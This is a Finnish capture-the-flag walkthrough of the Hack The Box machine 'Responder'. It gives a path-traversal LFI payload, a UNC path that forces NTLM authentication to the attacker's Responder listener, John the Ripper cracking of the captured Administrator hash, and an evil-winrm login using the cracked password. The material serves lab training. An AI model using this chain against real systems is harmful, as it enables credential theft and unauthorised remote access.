Kohteen Nmap-skannauksesta huomataan, että kohteessa on avoinna portit 80, 5985 ja 7680. Portissa 80 on käynnissa Apache-palvelin, ja portissa 5985 WinRM (Windows Remote Management, portin 5985 yksityiskohdat). Service Infosta nähdään, että kysessä on Windows kone.
Selaimella aukaistu kohteen IP-osoite. Sivu ei ensin auennut ja ohjasi osoitteeseen: unika.htb. Lisätty kohteen IP-osoite ja URL-osoite unika.htb /etc/hosts -tiedostoon, ja päivitetty sivu, niin sivulle tuli sisältöä.
Sivun kieleksi vaihdettu yläpalkista ranska. Osoiteriviltä huomataan, että page -parametri lataa sivun french.html.
Osoiteriville lisätty page -parametrin jälkeen: ../../../../../../../../windows/system32/drivers/etc/hosts. ../ merkillä pääsee takaisin tiedostojärjestelmässä, ja näin varmistetaan että päästään pois hakemistosta, jossa ollaan. tällä hetkellä ../ -merkkejä kannattaa laittaa mielummin liikaa, kuin liian vähän, koska juurihakemistoa kauemmas ei pääse. Onnistuneesti päästiin tarkastelemaan kohteen hakemistoa C:\windows\system32\drivers\etc\hosts, joten kohde on altis LFI (Local File Inclusion) -haavoittuvuudelle.
Responder-työkalun avulla käynnistetään SMB-palvelin. Varmistettu, että tiedostossa Responder.conf on SMB-pyyntöjen kuuntelu päällä.
Käynnistetty Responder komennolla: sudo responder -I tun0
Lisäoptiolla -I täsmennetty käytössä oleva verkkoliitäntä (tun0, koska OpenVPN-yhteys Hack the Box-palvelimelle).
Selaimessa asetettu page -parametriksi: //10.10.14.80/someShare
10.10.14.80 on oma tun0-IP-osoite ja someShare tilalle voi laittaa mitä tahansa tekstiä. Payloadin lähettämisen jälkeen saatiin selaimessa virhe: tiedoston lataaminen epäonnistui.
Payloadin lähtettämisen jälkeen Responder sieppasi käyttäjän Administrator NetNTLMv2 salasanatiivisteen. Kentässä NTLMv2-SSP Username : RESPONDER\Administrator RESPONDER tarkoittaa toimialuetta.
Kopioitu salasanatiiviste hash -tekstitiedostoon komennolla: echo “hash” > hash.txt
Salasana murrettu tiivisteestä John the Ripperin ja sanalistan rockyou.txt avulla komennolla: john -w=/usr/share/wordlists/rockyou.txt hash.txt
Onnistuneesti löydetty käyttäjän Administrator salasana: badminton
Koska kohteessa on käynnissä portissa 5985 WinRM-palvelu, otetaan yhteyttä WinRM-palveluun työkalulla Evil-WinRM (työkalua tarvitaan, koska PowerShell ei ole oletuksena asennettu Linuxiin). Komento: evil-winrm -i 10.129.95.234 -u administrator -p badminton
Komennon lisäoptioilla -i täsmennetty kohteen IP-osoite, optiolla -u käyttäjä ja -p salasana. Onnistuneesti saatu yhteys kohteeseen.
Root flag löyty hakemistosta C:\Users\mike\Desktop\flag.txt